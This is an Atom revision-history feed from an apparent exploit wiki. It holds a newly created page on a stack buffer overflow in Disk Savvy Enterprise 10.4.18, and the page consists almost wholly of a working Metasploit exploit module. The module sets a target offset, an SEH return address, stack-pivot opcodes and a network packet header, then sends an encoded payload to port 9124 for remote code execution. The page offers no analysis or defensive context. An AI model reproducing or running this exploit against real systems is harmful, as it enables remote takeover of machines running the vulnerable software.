https://pwnwiki.com/index.php?action=history&feed=atom&title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
Disk Savvy Enterprise 10.4.18 緩衝區溢出漏洞 - Revision history
2026-04-25T10:13:37Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=1531&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."
2021-04-11T02:10:54Z
<p>Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = GreatRanking<br />
<br />
include Msf::Exploit::Remote::Tcp<br />
include Msf::Exploit::Remote::Seh<br />
<br />
def initialize(info = {})<br />
super(update_info(info,<br />
'Name' => 'Disk Savvy Enterprise v10.4.18',<br />
'Description' => %q{<br />
This module exploits a stack-based buffer overflow vulnerability<br />
in Disk Savvy Enterprise v10.4.18, caused by improper bounds<br />
checking of the request sent to the built-in server. This module<br />
has been tested successfully on Windows 7 SP1 x86.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'Daniel Teixeira'<br />
],<br />
'DefaultOptions' =><br />
{<br />
'EXITFUNC' => 'thread'<br />
},<br />
'Platform' => 'win',<br />
'Payload' =><br />
{<br />
'BadChars' => "\x00\x02\x0a\x0d\xf8",<br />
'Space' => 800<br />
},<br />
'Targets' =><br />
[<br />
[ 'Disk Savvy Enterprise v10.4.18',<br />
{<br />
'Offset' => 124,<br />
'Ret' => 0x10056d13<br />
}<br />
]<br />
],<br />
'Privileged' => true,<br />
'DisclosureDate' => 'Jan 31 2017',<br />
'DefaultTarget' => 0))<br />
<br />
register_options([Opt::RPORT(9124)])<br />
<br />
end<br />
<br />
def exploit<br />
seh = generate_seh_record(target.ret)<br />
connect<br />
<br />
buffer = make_nops(target['Offset'])<br />
buffer << seh<br />
buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh<br />
buffer << "\x83\xc4\x21" #ADD esp,21h<br />
buffer << "\xff\xe4" #JMP esp<br />
buffer << payload.encoded<br />
buffer << Rex::Text.rand_text_alphanumeric(1)<br />
<br />
header = "\x75\x19\xba\xab"<br />
header << "\x03\x00\x00\x00"<br />
header << "\x00\x40\x00\x00"<br />
header << [buffer.length].pack("V")<br />
header << [buffer.length].pack("V")<br />
header << [buffer[-1].ord].pack("V")<br />
packet = header<br />
packet << buffer<br />
<br />
sock.put(packet)<br />
handler<br />
end<br />
end<br />
</pre></div>
Pwnwiki